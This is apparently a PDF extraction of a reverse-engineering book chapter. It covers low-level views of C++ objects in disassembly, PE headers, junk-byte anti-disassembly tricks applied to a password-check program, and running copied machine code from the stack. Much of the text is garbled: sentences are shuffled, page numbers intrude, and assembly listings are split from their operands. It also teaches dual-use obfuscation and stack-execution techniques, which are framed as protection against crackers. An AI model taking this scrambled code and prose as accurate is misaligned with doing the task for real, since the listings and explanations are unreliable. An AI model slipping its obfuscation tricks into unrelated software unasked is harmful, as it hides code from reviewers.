The code can be now identified. The scrutiny of earlier example helps in understanding the above example. Remember in mathematics the multiplication is the summation of one value times the other, thus, by simply keeping this principle in mind, we can identify that the bunch of code results into product. Thus, a masked code for multiplication operator.
78
Classes have some internal definite structures. the objects can be declared statically or dynamically. It is not necessary whether they are declared explicitly. 79 .The Object Oriented World Its time to study some modern programming approaches. The statically declared object members (the functions and variables declared in a class) get their calls from direct offsets. This is the major difference between the object functions and other functions. means in arguments list it lies at first place or the leftmost argument (_cdecl convention). both can be used in each others place. the difference lies in one aspect. Friends. no such pointer is provided to the other functions. Like classes have constructors & destructors. There is always a difference between ordinary functions and the object member functions (the class functions). The classes are the most essential parts of object-oriented programming. but. all members of a structure are public if not declared explicitly while in a class all members are private if not declared public or private explicitly. The static object members are called similar to other static functions. The object member functions are provided with a pointer to the object instance implicitly and it is the argument pushed on the stack last. The ‘this’ pointer is prepared in ECX register by default by the Visual Studio compiler. while dynamic declaration is also called object instantiation. while dynamic declared object member functions follow the object instantiation process first. by default. We’ll identify them at lower level. No object member function will get a call without parsing ‘this’ pointer into the arguments list While. can you differentiate the structures from classes? There is no difference. The object instances are initiated in instantiation process. we mean we are going to discus the object oriented programming at lower level. the study of OOP is similar to study of classes. Therefore. This pointer is called this pointer. The classes have objects of its kind.
a constructor initializes all the class members and places base address for tracking these class members. Remember. 80 . afterwards all the members get their instantaneous addresses. a destructor may be virtual or non-virtual but a constructor will never be virtual.0 in our example that is ideal compiler for all these concepts. This may be because. Then there is something like virtual functions. which do not have a constant offset but are tracked by a virtual table also known as vtbl.Note: We are using VC++ 6.
which can be understood by the operating system and the processor. class myClass public: void myFunc(). The classes and objects are the things. there exist no class or object at the lower level. processors do not know what the objects are in real world. /* classex1. { 81 .cpp */ #include <iostream> using namespace std. cannot be addressed. There is always a call for new () function in objectoriented programs. the things. which don’t exist. Compiler may place a check if a constructor is already defined in the program. Let’s form an ideal example employing OOP technique and the static object declaration. Remember the compiler places only the code. An address for nothing never exists. The check ensures that the developer-defined constructors should be called instead of new () code generated by constructor. Instead only object instances exist & remain in the traces. void myClass::myFunc() } { cout << "This is an OOP example. Or more generally. }. there should be something to exist at that address. which exist only at higher level.Once everything gets its entry in virtual table the destructor may also be listed in virtual table. Note: The processor cannot think and imagine like us. The class and objects are only for human understanding and OS and processors have nothing to do with that approach. The new () function takes only one integer type argument and returns a pointer. it is because it needs something to initialize. The argument is mostly 1. ‘this’ pointer traces the object instances. Remember." << endl. And the compiler acts as an interpreter who translates the human instructions to processor instructions.
char* argv[]) myClass exClass.txt: Note: Always start from the code of main. Now disassemble the exe file using dumpbin Dumpbin /disasm classex1.ebp ebp push mov push push push call ecx dword ptr [ebp-4].int main (int argc. exClass. 00401081: 51 00401082: 89 4D FC 00401085: 68 E0 10 40 00 0040108A: 68 A0 C0 40 00 0040108F: 68 78 CD 40 00 00401094: E8 A7 05 00 00 .txt And check the following excerpt of the code from classex1. return EXIT_SUCCESS.esp . call for function generating new line in the output. myFunc: 0040107E: 55 0040107F: 8B EC . 82 . call for cout function 00401099: 83 C4 08 0040109C: 8B C8 0040109E: E8 5D 00 00 00 004010A3: 8B E5 004010A5: 5D 004010A6: C3 add mov call mov pop ret esp.exe >classex1.cpp It will remove all the optimizations from compiled code.eax 00401100 esp. } { Compile the above program using the following command: CL /Gs classex1. function prologue.myFunc().ecx 4010E0h 40C0A0h 40CD78h 00401640 push mov ebp ebp.8 ecx.
[ebp-4] ." . _main: 004010A7: 55 004010A8: 8B EC 004010AA: 51 004010AB: 8D 4D FC push mov push lea ebp ebp. But remember that the object instance is static one. return EXIT_SUCCESS. }. no object instantiation code is generated. char* argv[]) exClass->myFunc(). Now let’s alter the same program classex1. void myClass::myFunc() } int main (int argc.ebp ebp . the call for myFunc is directly made. class myClass public: void myFunc(). { myClass *exClass = new myClass.cpp but this time with dynamic object declaration as follows: /* classex2. 004010AE: E8 CB FF FF FF 004010B3: 33 C0 004010B5: 8B E5 004010B7: 5D 004010B8: C3 call xor mov pop ret 0040107E eax.esp ecx ecx. function epilogue..eax esp. { cout << "This is an OOP example.cpp */ #include <iostream> using namespace std. the ‘this’ pointer is prepared in ecx register. It will be generated in dynamic declaration of objects. { 83 .
Two double words 8 bytes are reserved on the stack. of a class. prologue ends. 0040109E: 83 EC 08 004010A1: 6A 01 .txt: myFunc: .} Compile the above code and disassemble the exe file just like previous example. probably the call for new () function. push mov ebp ebp. call for cout.esp mov pop ret esp. 00401081: 51 00401082: 89 4D FC 00401085: 68 A0 C0 40 00 0040108A: 68 78 CD 40 00 0040108F: E8 5C 00 00 00 . _main: 0040109B: 55 0040109C: 8B EC . Let’s study the following excerpt of the disassembled code from classex2. 004010A3: E8 EF 31 00 00 call 00404297 . to form a reference for an object instance push mov ebp ebp.esp . the ‘this’ pointer is pushed on the stack.ecx 40C0A0h 40CD78h 004010F0 .ebp ebp add esp. 00401097: 8B E5 00401099: 5D 0040109A: C3 . the object instantiation begins here and will end with the preparation 84 . for ‘this’ pointer. epilogue starts here.8 . 00401094: 83 C4 08 . . 0040107E: 55 0040107F: 8B EC . New () takes only one integer sub push esp. epilogue of myFunc ends here.8 1 . start of prologue for myFunc. push mov push push call ecx dword ptr [ebp-4]. clearing the stack frame of cout function. 1 is pushed on the stack.
eax ecx.4 . call for myFunc. call 0040107E Let’s create another example employing the constructor and destructor: /* classcds. the code below is preparing the ‘this’ pointer. the epilogue of _main begins. class myClass public: { 85 . type argument and returns an address. . 004010BC: 33 C0 . 004010BE: 8B E5 004010C0: 5D 004010C1: C3 . the return value 0 is prepared in eax register.cpp */ #include <iostream> using namespace std. the object still lies in the memory. 004010AB: 89 45 F8 004010AE: 8B 45 F8 004010B1: 89 45 FC 004010B4: 8B 4D FC mov mov mov mov dword ptr [ebp-8].dword ptr [ebp-4] ..eax eax.eax . mov pop ret esp. . probably the previous function was new (). we should place the object destruction . the this pointer is prepared in ecx register which is an implicit . to avoid such memory leaks. yes! The above line clears out the single argument from the stack. argument for the object instance functions. 004010A8: 83 C4 04 add esp.dword ptr [ebp-8] dword ptr [ebp-4]. . .ebp ebp xor eax. 004010B7: E8 C2 FF FF FF . the _main ends. code. No it’s a memory leak.
myClass(void). } { Compile the above program as: Cl /Gs classcds.esp 86 . char* argv[]) myClass exClass. while the destructor gets call while demolishing the object instance.". that of class class name. C:\access denied\code> We see that the constructor gets the call first automatically and then destructor is called after that the program exits. Well.cpp Let us check the output of above program C:\access denied\code>classcds The constructor gets invoked. // constructors have the same name as // destructors have ~ sign prefixed to cout << "The constructor gets invoked. cout << "\nThe destructor gets invoked.". The destructor gets invoked. myClass::myClass(void) } myClass::~myClass(void) { { ~myClass(void). constructor gets call while object instantiation. return EXIT_SUCCESS. we haven’t called the constructor or destructor in main function. } int main (int argc. }. Let’s check out its disassembled code: constructor: 0040107E: 55 0040107F: 8B EC push mov ebp ebp. But in original program code.
push mov push push call add mov mov pop ret push mov push mov push push call add mov pop ret push mov sub lea call mov lea ecx dword ptr [ebp-4].0 ecx.ecx 40C0A0h 40CD98h 00401100 esp.[ebp-4] .00401081: 51 00401082: 89 4D FC 00401085: 68 A0 C0 40 00 0040108A: 68 98 CD 40 00 0040108F: E8 6 004010A5: 68 C0 C0 40 00 004010AA: 68 98 CD 40 00 004010AF: E8 08 004010C1: 8D 4D FC 004010C4: E8 B5 FF FF FF . .ebp ebp ebp ebp.esp esp. 004010C9: C7 45 F8 00 00 00 00 004010D0: 8D 4D FC .dword ptr [ebp-4] esp. 004010D3: E8 C6 FF FF FF .ebp ebp ebp ebp. once again the ‘this’ pointer is passed to destructor an an implicit call 0040109E 87 . argument. call for constructor. call for destructor.ecx 40C0C0h 40CD98h 00401100 esp.esp ecx dword ptr [ebp-4].8 ecx.8 eax.[ebp-4] 0040107E dword ptr [ebp-8]. the ‘this’ pointer is passed to the constructor through ecx register.8 esp.
dword ptr [ebp-8] . no xor this time for creating return value.004010D8: 8B 45 F8 mov eax. 004010DB: 8B E5 004010DD: 5D 004010DE: C3 mov pop ret esp. it is directly copied from .ebp ebp 88 . stack variable into eax register.
".Global Objects The global objects are declared with the static keyword. Therefore. If objects are declared as global then. Global objects are created in the data section during compile time & differ from other runtime object instantiation in a way that their instantiation is error free. class name. }. myClass::myClass(void) } myClass::~myClass(void) { cout << "\nThe destructor gets invoked. 89 . they are already instantiated in the data section and do not need the constructors to be called.". class myClass public: myClass(void). a check is made in the generated code which blocks the constructor code from being executed. that of class ~myClass(void). which may cause problems if not allotted in other instantiations. It means no extra memory is needed. Let’s frame an ideal example: Now let us alter the above program with a dynamic object instantiation: /* classcd. // constructors have the same name as // destructors have ~ sign prefixed to { myClass *exClass = new myClass. } int main (int argc. char* argv[]) { { cout << "The constructor gets invoked.cpp */ #include <iostream> using namespace std.
ecx 40C0A0h 40CD98h 00401120 esp. Note: The stack is also called automatic memory. while heap is also called dynamic memory.esp ecx dword ptr [ebp-4]. C:\access denied\code> Only the constructor gets the call.esp ecx dword ptr [ebp-4]. Let’s check out its disassembled code: Constructor: 0040107E: 55 0040107F: 8B EC 00401081: 51 00401082: 89 4D FC 00401085: 68 A0 C0 40 00 0040108A: 68 98 CD 40 00 0040108F: E8 8 push mov push mov ebp ebp.dword ptr [ebp-4] esp.ecx push mov push mov push push call add mov mov pop ret ebp ebp. while destructor is not called at all.return EXIT_SUCCESS.8 eax.ebp ebp 90 . } Let’s check the output of program: C:\access denied\code>classcd The constructor gets invoked. The dynamic instantiation creates the object instances on the heap and heap objects needs a manual call for delete or free function.
004010C3: E8 FF 31 00 00 .4 dword ptr [ebp-8].004010A5: 68 C0 C0 40 00 004010AA: 68 98 CD 40 00 004010AF: E8 0C 004010C1: 6A 01 . call for new function. memory.8 esp.ebp ebp ebp ebp. 004010C8: 83 C4 04 004010CB: 89 45 F8 004010CE: 83 7D F8 00 004010D2: 74 0D 004010D4: 8B 4D F8 004010D7: E8 A2 FF FF FF 004010DC: 89 45 F4 004010DF: EB 07 004010E1: C7 45 F4 00 00 00 00 004010E8: 8B 45 F4 004010EB: 89 45 FC 004010EE: 33 C0 004010F0: 8B E5 004010F2: 5D 004010F3: C3 push push call add mov pop ret push mov sub push 40C0C0h 40CD98h 00401120 esp.0 004010E1 ecx.eax eax.0Ch 1 .ebp ebp 91 . something must be placed in memory for initializing the object in call add mov cmp je mov call mov jmp mov mov mov xor mov pop ret 004042C7 esp.dword ptr [ebp-8] 0040107E dword ptr [ebp-0Ch].esp esp.dword ptr [ebp-0Ch] dword ptr [ebp-4].eax dword ptr [ebp-8].eax esp.0 eax.eax 004010E8 dword ptr [ebp-0Ch].
6). return EXIT_SUCCESS. { { cout << "This is an OOP example. { cout << "The constructor gets the call." << endl. class name. cout << "\nMaximum(5. class myClass public: myClass(void). } { myClass *exClass = new myClass. int b). int maxim(int a. myClass::myClass(void) } myClass::~myClass(void) { cout << "The distructor gets the call. // constructors have the same name as // destructors have ~ sign prefixed to { 92 . char* argv[]) exClass->myFunc(). void myFunc()." << endl. 6) = " << exClass->maxim(5." . int b) return a>b?a:b. that of class ~myClass(void). } void myClass::myFunc() } int myClass::maxim (int a. } int main (int argc. }./* classex3.cpp */ #include <iostream> using namespace std.
eax 00401200 eax.ecx 4011E0h 4140B0h 415CD8h 00401AD0 .ebp ebp push mov push mov push push push call ebp ebp.8 ecx.esp ecx dword ptr [ebp-4]. call to generate the new line in screen display.cpp And disassemble the exe file as: Dumpbin /disasm classex3.txt: Constructor (myClass): 0040107E: 55 0040107F: 8B EC 00401081: 51 00401082: 89 4D FC 00401085: 68 E0 11 40 00 0040108A: 68 B0 40 41 00 0040108F: 68 D8 5C 41 00 00401094: E8 37 0A 00 00 .txt Let’s check out the following block of disassembled code from classex3.dword ptr [ebp-4] esp.compile the above program as: Cl /Gs classex3. 00401099: 83 C4 08 0040109C: 8B C8 0040109E: E8 5D 01 00 00 004010A3: 8B 45 FC 004010A6: 8B E5 004010A8: 5D 004010A9: C3 . Destructor (~myClass): 004010AA: 55 004010AB: 8B EC 004010AD: 51 004010AE: 89 4D FC 004010B1: 68 E0 11 40 00 004010B6: 68 D0 40 41 00 004010BB: 68 D8 5C 41 00 004010C0: E8 0B 0A 00 00 push mov push mov push push push call ebp ebp.ecx 4011E0h 4140D0h 415CD8h 00401AD0 add mov call mov mov pop ret esp.esp ecx dword ptr [ebp-4]. 93 . constructor ends here.exe >classex3. call for cout function.
004010D3: 55 004010D4: 8B EC 004010D6: 51 004010D7: 89 4D FC 004010DA: 68 F0 40 41 00 004010DF: 68 D8 5C 41 00 004010E4: E8 E7 09 00 00 .dword ptr [ebp+8] dword ptr [ebp-8]. . while the first .ebp ebp . destructor ends here.. argument lies at offset of 13 bytes from the stack frame base (ebp) 004010FC: 3B 45 0C . cmp compares two numbers.dword ptr [ebp+0Ch] 94 . this pointer is stored on the stack in a variable. 004010E9: 83 C4 08 004010EC: 8B E5 004010EE: 5D 004010EF: C3 maxim: 004010F0: 55 004010F1: 8B EC 004010F3: 83 EC 08 004010F6: 89 4D FC 004010F9: 8B 45 08 push mov sub mov mov ebp ebp.8 dword ptr [ebp-4]. 8 bytes offset from stack frame base. call for cout function. call to generate the new line in screen display.ebp ebp push mov push mov push push call ebp ebp.dword ptr [ebp+8] add mov pop ret esp.esp esp.ecx 0040110F cmp eax.ecx eax.ecx 4140F0h 415CD8h 00401AD0 add mov call mov pop ret esp.8 esp.esp ecx dword ptr [ebp-4]. 004010FF: 7E 08 00401101: 8B 4D 08 00401104: 89 4D F8 00401107: EB 06 jle mov mov jmp 00401109 ecx. call for cout.eax 00401200 esp. the second argument is placed in eax register which lies at . 004010C5: 83 C4 08 004010C8: 8B C8 004010CA: E8 31 01 00 00 004010CF: 8B E5 004010D1: 5D 004010D2: C3 .8 ecx. .
0040111E: 6A 01 . argument for new () function. .0 push 1 95 .0Ch . as the arguments are being cleared .eax dword ptr [ebp-8]. both Pascal .esp esp.dword ptr [ebp-8] 0040107E dword ptr [ebp-0Ch]. this is __stdcall convention. probably the last call was for new.ebp ebp 8 .dword ptr [ebp-4] 004010D3 mov cmp je mov call mov jmp mov dword ptr [ebp-8].dword ptr [ebp-8] esp. 00401120: E8 C2 57 00 00 00401125: 83 C4 04 call add 004068E7 esp. probably call for new () function. 13 bytes reserved on the stack. and _cdecl are followed.00401109: 8B 55 0C 0040110C: 89 55 F8 0040110F: 8B 45 F8 00401112: 8B E5 00401114: 5D 00401115: C2 08 00 mov mov mov mov pop ret edx. by the called function itself (Pascal convention). the object instantiation has been started. _main: 00401118: 55 00401119: 8B EC 0040111B: 83 EC 0C push mov sub ebp ebp. . while the arguments .dword ptr [ebp+0Ch] dword ptr [ebp-8]. 00401128: 89 45 F8 0040112B: 83 7D F8 00 0040112F: 74 0D 00401131: 8B 4D F8 00401134: E8 45 FF FF FF 00401139: 89 45 F4 0040113C: EB 07 0040113E: C7 45 F4 00 00 00 00 00401145: 8B 45 F4 00401148: 89 45 FC 0040114B: 8B 4D FC 0040114E: E8 80 FF FF FF mov mov mov call eax. are being pushed in __cdecl convention for this function.0 0040113E ecx.edx eax. . cleared only a single argument. __stdcall convention is followed.dword ptr [ebp-0Ch] dword ptr [ebp-4].4 .eax 00401145 dword ptr [ebp-0Ch]. below the ‘this’ pointer is being prepared in ecx register.eax ecx.
because the maxim is a member of object . 0040115F: 50 00401160: 68 08 41 41 00 00401165: 68 D8 5C 41 00 0040116A: E8 61 09 00 00 .eax esp.ebp ebp push push push call eax 414108h 415CD8h 00401AD0 call 004010F0 We observed that the dynamically declared object instances destructor is not executed. class and operates on object instance. 96 ..eax 00401220 eax. the ‘this’ pointer which is the pointer for object instance is being .dword ptr [ebp-4] . pushed on the stack of maxim. call for cout. below the arguments for maxim are being pushed on the stack. 0040116F: 83 C4 08 00401172: 8B C8 00401174: E8 A7 00 00 00 00401179: 33 C0 0040117B: 8B E5 0040117D: 5D 0040117E: C3 add mov call xor mov pop ret esp.8 ecx. 0040115A: E8 91 FF FF FF . call for maxim( 5. 6). 00401153: 6A 06 00401155: 6A 05 00401157: 8B 4D FC push push mov 6 5 ecx.
The PE files always start with a MZ header or also known as the DOS Stub. The PE header contains all the information about the executable program. 97 . The MZ header constitutes the beginning of the Windows NT executables. Which can be identified easily by MZ and then a little after “This program cannot be run in DOS mode…”. the above shown line in double quotes is printed on the console screen and the program exits.Surgery of PE Headers The Windows NT executable files are also termed as PE executables. which follows the Dos stub. where PE stands for Portable Executable. During normal execution in windows mode this header is directly crossed over and the executional control lands on the PE header. All PE executables bear an identical structure. A careful alteration of PE header can turn the cracking process more tedious and boost up the security. Otherwise in DOS mode. But a skillful hacker can find his path if he bears enough knowledge of the PE header.
The developers can use the techniques to derail the process of cracking the security by injecting the false instructions in normal executing instructions. But do not follow the actual execution path. This fact can be used to fool the dissemblers. Remember that these techniques cannot stop a dedicated hacker from achieving his goals. Let us discus these techniques in detail. We can employ the process of decryption of important parts of program code during the execution. But can probably slow down the process of cracking.Anti-Disassembling Techniques The dissemblers in this world are yet not smart enough and intelligent. There are several techniques to harden the cracking process. Having the encrypted code. always produce a wrong disassembly leading the crackers to false path. The dissemblers just translate the machine code into assembly from top to bottom. 98 .
Inserting False Machine Code The fact is that the intentionally introduced false instructions are not followed during execution.cpp */ #include <iostream> using namespace std." << endl. } else } } return EXIT_SUCCESS.cpp program for employing this technique here. buffPass) == 0) system("START"). /* secpass. thus there is nearly no difference between the performances of original program and the one utilizing such antidissembling techniques. 21).cpp by adding NOP sleds in the code as shown below and give it the name sechard. { { char password[] = "iAMsatisfied". In this technique we are going to force the dissemblers to produce the wrong disassembled assembly code. a <= 3. which can increase the strength of security code to some degree. We are going to modify the programming code of secpass. int main (int argc. if (strcmp (password.cpp. } { cout << "Login failed. for (int a=1. char* argv[]) char buffPass[21]. We are going to use the same earlier secpass. cin. a++) { cout << "Enter the password: ". /* sechard. exit(0).getline(buffPass.cpp */ 99 .
int main (int argc. cin. buffPass) == 0) __asm { nop jmp offset lab3 nop nop nop } lab2: system("START"). for (int a=1. 100 . 21). char* argv[]) char buffPass[21].#include <iostream> using namespace std. __asm { nop lab3: jmp offset lab2 nop nop nop nop } } else } { cout << "Login failed.getline(buffPass. a++) { cout << "Enter the password: ". { { char password[] = "iAMsatisfied". __asm { jmp offset lab1 nop nop } lab1: if (strcmp (password. exit(0). a <= 3." << endl.
} The jump instructions along with NOP instructions are placed to control the execution path of the processor.414D00h 004013F0 004010EB eax.exe A part of the main section of disassembled code is shown below: 004010D7: 004010D9: 004010DC: 004010DD: 004010E2: 004010E7: 004010E9: 004010EA: 004010EB: 004010EE: 004010EF: 004010F2: 004010F3: 004010F8: 004010FB: 004010FD: 004010FF: 00401100: 00401102: 00401103: 00401104: 00401105: 0040110A: 0040110F: 00401112: 00401114: 00401119: 0040111A: 0040111C: 0040111D: 0040111E: 6A 8D 52 B9 E8 EB 90 90 8D 50 8D 51 E8 83 85 75 90 EB 90 90 90 68 E8 83 6A E8 90 EB 90 90 90 15 55 E8 00 4D 41 00 09 03 00 00 02 45 E8 4D D4 88 47 00 00 C4 08 C0 23 18 D8 CC C4 00 ED E9 30 41 00 46 00 00 04 45 00 00 push lea push mov call jmp nop nop lea push lea push call add test jne nop jmp nop nop nop push call add push call nop jmp nop nop nop 15h edx.8 eax. Compile the above program and disassemble using following command: Dumpbin /disasm sechard.eax 00401122 0040111A 4130D8h 004057DB esp.[ebp-2Ch] ecx 00405880 esp.[ebp-18h] edx ecx.exe.} return EXIT_SUCCESS.4 0 00405706 00401105 101 . Let us study the disassembly of the sechard.[ebp-18h] eax ecx. but without affecting the performance and the objective of the program. We have to change the NOP instructions to anything so that the disassembled code should be translated wrongly.
0040111F: 00401120: 00401122: 00401127: 0040112C: 00401131: 90 EB 68 68 68 E8 1E 70 E0 70 8A 11 30 4C 13 40 41 41 00 00 00 00 00 nop jmp push push push call 00401140 401170h 4130E0h 414C70h 004024C0 Now open sechard.eax 685EFC2C 00401136 eax byte ptr [eax-20h].4 0 00405706 00401105 eax.al esp.[ebp-18h] edx ecx. Follow the same step for other NOP sleds also.al 414C70h 004024C0 102 .8 eax.ch byte ptr [ecx].exe in hex editor and bring the cursor at first NOP sled and insert any hex value after the jmp instruction.eax 00401122 0040111A ecx 31187911 ecx al. The new disassembly is as follows: 004010D7: 004010D9: 004010DC: 004010DD: 004010E2: 004010E7: 004010E9: 004010EE: 004010EF: 004010F2: 004010F3: 004010F8: 004010FB: 004010FD: 004010FF: 00401100: 00401102: 00401103: 00401108: 00401109: 0040110B: 0040110C: 0040110D: 0040110F: 00401112: 00401114: 00401119: 0040111A: 0040111C: 0040111E: 00401123: 00401125: 00401126: 00401129: 0040112C: 00401131: 6A 8D 52 B9 E8 EB E8 50 8D 51 E8 83 85 75 90 EB 51 E8 41 00 CC 46 00 83 6A E8 90 EB 85 E8 70 40 00 30 68 E8 15 55 E8 00 4D 41 00 09 03 00 00 02 09 8D 45 E8 4D D4 88 47 00 00 C4 08 C0 23 18 09 68 D8 30 E8 00 C4 04 00 ED 45 00 00 E9 C0 09 EB 1E 68 11 68 41 70 8A E0 00 4C 41 00 13 00 00 push lea push mov call jmp call push lea push call add test jne nop jmp push call inc add int inc add add push call nop jmp test call jo inc add xor push call 15h edx.[ebp-2Ch] ecx 00405880 esp.414D00h 004013F0 004010EB E8859DF7 eax ecx.ch 3 esi byte ptr [eax].
This technique is mostly employed. 103 . the disassembled code is mangled and the dissembler produces the wrong assembly code.Well friends. but is not so hard to be cracked. The hackers are skilled enough to reverse the steps and find out the original disassembly by following the actual execution of the program and replacing the false code with NOP sled again. the bold hex numbers have replaced all 0x90s after the jmp instructions. And due to this.
Exporting & Executing Code on Stack The code execution on stack provides some advantages as well as disadvantages over executing the code in .text section. The code on the stack memory can be modified during execution without using WriteProcessMemory. For security point of view, it increases the immune system of the program. But there are some serious backholes in the code execution on stack. Due to some implementation bugs, the execution of the processor can be controlled and the attacker can transfer the execution on to the user controlled buffers to execute the devastating code. The relocation of code on stack has to tackle few serious problems first. One serious problem is the change in all relative offsets of functions and the arguments or data. The Intel x86 architecture based processors use relative references (the offsets) rather than the hardcoded addresses. This feature helps to maintain the portability & relocation of the software. But this feature creates problem if we have to relocate only a small portion of the code during runtime. All the offsets point to false locations after relocation of a small portion of the code. Actually, the addresses are calculated by subtracting the two memory addresses of the memory locations or by counting the number of bytes between two memory locations. It means if we have to jump to another location then, the jump is done by counting the offset bytes from that location instead of locating the address. The code is copied to a new location in the memory (on the stack memory). Thus, all relative offsets are also copied as it is. But these offsets after relocation, points to false positions. The second problem is about hardcoded addresses. During relocation the hardcoded address will point to same location, while the code at that position may have changed its location. This is the problem when a code copied from one program is used in another program, the called addresses in transported code will be pointing to wrong addresses in the program where it is being transplanted.
104
It is a serious problem with the portability of the relocatable code. This problem can be tackled by using the pointers for every variable and the function called from within the relocatable code. The best way is to pack the relocatable code inside a function body and provide the pointers of all variables and functions used within the code to this function as its arguments. In the program where this code is used we need to provide this relocated function the new addresses and offsets of locations called from within the relocated code. Let’s study these steps in next examples.
/* onstack.cpp */ #include <iostream> using namespace std; void stackExec(char (*sBuffer), int (*print) (const char *,...)) print(sBuffer); } int main (int argc, char* argv[]) { char strBuffer[] = "JaiDeva! Learning the memory handling techniques.\n"; char strBuff[100], codeBuff[500]; int funcLen, strLen; int (*print) (const char *,...); void (*stackEx) (char (*), int (*) (const char *,...)); int (*mainFunc) (int, char **); print = printf; stackEx = stackExec; mainFunc = main; funcLen = (unsigned int)mainFunc - (unsigned int)stackEx; strLen = strlen(&strBuffer[0]); for(int i = 0; i < strLen; i++) {
105
strBuff[i] = strBuffer[i]; strBuff[strLen] = '\0'; for(i = 0; i < funcLen; i++) codeBuff[i] = ((char *)stackEx)[i]; stackEx = (void (*) (char *, int (*) (const char *,...)))&codeBuff[0]; stackEx(strBuff, print); return EXIT_SUCCESS; }
The above code should be compiled by disabling the stack checking calls. We have t disable the stack checking routine chkesp in order to make the program properly work. You can do it using the following command:
CL /Gs onstack.cpp
or by setting the project compilation settings as final compilation. The chkesp function always checks the state of the stack while any instruction tries to access the stack memory. The stack protection cookie or canary is written on the top of the stack after every write in stack memory. The chkesp checks this canary value and match it with authoritative canary in data section. If match is not found, it is considered that the stack is not properly handled and an exception is thrown. This canary value will be written on every buffer we are using whether for code or for so while transferring the execution control on the code at top of the stack, the processor tries to execute this canary value and thus the program crashes. Therefore we have to avoid such situations by removing the stack checking routines. Let us discus the purpose of above code. The part of the code:
void stackExec(char (*sBuffer), int (*print) (const char *,...)) print(sBuffer); } {
106
declares the function stackExec with two arguments of pointer type. The first argument *sBuffer is the pointer for the string buffer to be supplied for printing on the screen. The second argument is the function pointer for printf. Now in the next part:
int (*print) (const char *,...); void (*stackEx) (char (*), int (*) (const char *,...)); int (*mainFunc) (int, char **);
We are declaring three function type pointers, which will take the addresses of printf, stackExec, & main respectively as shown below:
print = printf; stackEx = stackExec; mainFunc = main;
Now in the next code line:
funcLen = (unsigned int)mainFunc - (unsigned int)stackEx;
We are calculating the size of stackExec function for copying its machine code into an array buffer on the stack.
strLen = strlen(&strBuffer[0]); for(int i = 0; i < strLen; i++) strBuff[i] = strBuffer[i]; strBuff[strLen] = '\0';
In above lines of code, we are copying the string from data section to an array on the stack. We can also use the srtcpy function.
for(i = 0; i < funcLen; i++) codeBuff[i] = ((char *)stackEx)[i];
In above code, we are copying the code of function stackExec into an array on the stack from the text section by using its reference (the pointer).
107
stackEx = (void (*) (char *, int (*) (const char *,...)))&codeBuff[0];
In above code, the reference of pointer for function stackExec is changed from earlier reference on text section to the code beginning on the stack by type casting the address of first element of code array on the stack.
stackEx(strBuff, print);
Finally, a call for the function stackExec is made on the stack using its reference (stackEx). The two pointers as arguments are provided for this function. Remember that the printf function is not displaced onto the stack, rather its reference is provided and its body remains on the text section, while we have already displaced the string on the stack. But still there is a problem with the portability of code of stackExec in above program. We cannot export the machine code of the required function and use it into another program. This is because the string used within the function stackExec lies in the local data section and from there it is transferred on to the stack. In another program where we have to place the code of stackExec the string needs to be handled explicitly there. This kind of situation can be handled by using the assembly inserts. We can directly place the string in stack memory, without using the data section. It also helps in the portability of the code, about which we would discus in next very section. Now let’s move on to another example utilizing the assembly inserts as follows:
/* assemstack.cpp */ #include <iostream> using namespace std; void printString(int (*print) (const char *,...)) __asm { {
108
sub esp, 30h mov byte ptr[ebp-2Fh],4Ah mov byte ptr[ebp-2Eh],61h mov byte ptr[ebp-2Dh],69h mov byte ptr[ebp-2Ch],44h mov byte ptr[ebp-2Bh],65h mov byte ptr[ebp-2Ah],76h mov byte ptr[ebp-29h],61h mov byte ptr[ebp-28h],21h mov byte ptr[ebp-27h],20h mov byte ptr[ebp-26h],4Ch mov byte ptr[ebp-25h],65h mov byte ptr[ebp-24h],61h mov byte ptr[ebp-23h],72h mov byte ptr[ebp-22h],6Eh mov byte ptr[ebp-21h],20h mov byte ptr[ebp-20h],74h mov byte ptr[ebp-1Fh],68h mov byte ptr[ebp-1Eh],65h mov byte ptr[ebp-1Dh],20h mov byte ptr[ebp-1Ch],6Dh mov byte ptr[ebp-1Bh],65h mov byte ptr[ebp-1Ah],6Dh mov byte ptr[ebp-19h],6Fh mov byte ptr[ebp-18h],72h mov byte ptr[ebp-17h],79h mov byte ptr[ebp-16h],20h mov byte ptr[ebp-15h],68h mov byte ptr[ebp-14h],61h mov byte ptr[ebp-13h],6Eh mov byte ptr[ebp-12h],64h mov byte ptr[ebp-11h],6Ch mov byte ptr[ebp-10h],69h mov byte ptr[ebp-0Fh],6Eh mov byte ptr[ebp-0Eh],67h mov byte ptr[ebp-0Dh],20h mov byte ptr[ebp-0Ch],74h
109
.. for(int i = 0. } { Only the prototype of function printString differs from the 110 .73h mov byte ptr[ebp-2].69h mov byte ptr[ebp-6].)))&codeBuff[0]. print = printf. unsigned int codeLen = (unsigned int)mainProc .68h mov byte ptr[ebp-8]. stackMover(print).(unsigned int)stackMover. int (*mainProc) (int. void (*stackMover) (int (*) (const char *. char* argv[]) char codeBuff[1000]. 34h } } int main (int argc. stackMover = printString. i++) codeBuff[i] = ((char *)stackMover)[i].75h mov byte ptr[ebp-4]. mainProc = main.65h mov byte ptr[ebp-0Ah]..00h lea eax. return EXIT_SUCCESS. [ebp-2Fh] push eax call [ebp+08h] add esp. i < codeLen..6Eh mov byte ptr[ebp-7]..71h mov byte ptr[ebp-5].2Eh mov byte ptr[ebp-1]. char **).))... int (*print) (const char *.65h mov byte ptr[ebp-3].63h mov byte ptr[ebp-9].).mov byte ptr[ebp-0Bh]... stackMover = (void (*) (int (*) (const char *.
Now consider the following instruction: sub esp. the instruction lea eax.65h The instruction mov byte ptr[ebp-x]. Let us discus some important aspects of the assemstack. We can place assembly instructions inside the parenthesis.earlier example. we can allocate the space on stack by subtracting the number of bytes.4Ah mov byte ptr[ebp-2Eh].y is used to push y on the stack at an offset of x from the address contained in ebp (at this point the ebp and esp contain the same value because of mov ebp.44h mov byte ptr[ebp-2Bh]. Remember the stack grows towards the lower memory addresses. __asm { } The __asm is used to insert the assembly code in any C/C++ program.69h mov byte ptr[ebp-2Ch].. 111 . Remember x & y are in hex format. 30h This instruction allocates 48 bytes (30h is hex equivalent of decimal 48) on the stack. All above instructions are pushing the string letters “JaiDe…” on the stack.61h mov byte ptr[ebp-2Dh].cpp program. Now. And the string handling code is also absent in main section. [ebp-2Fh] Loads the address of first byte of the string “JaiDeva!.. mov byte ptr[ebp-2Fh].” in eax register. therefore. esp instruction will be automatically placed in the prologue of the printString function in compiled code).
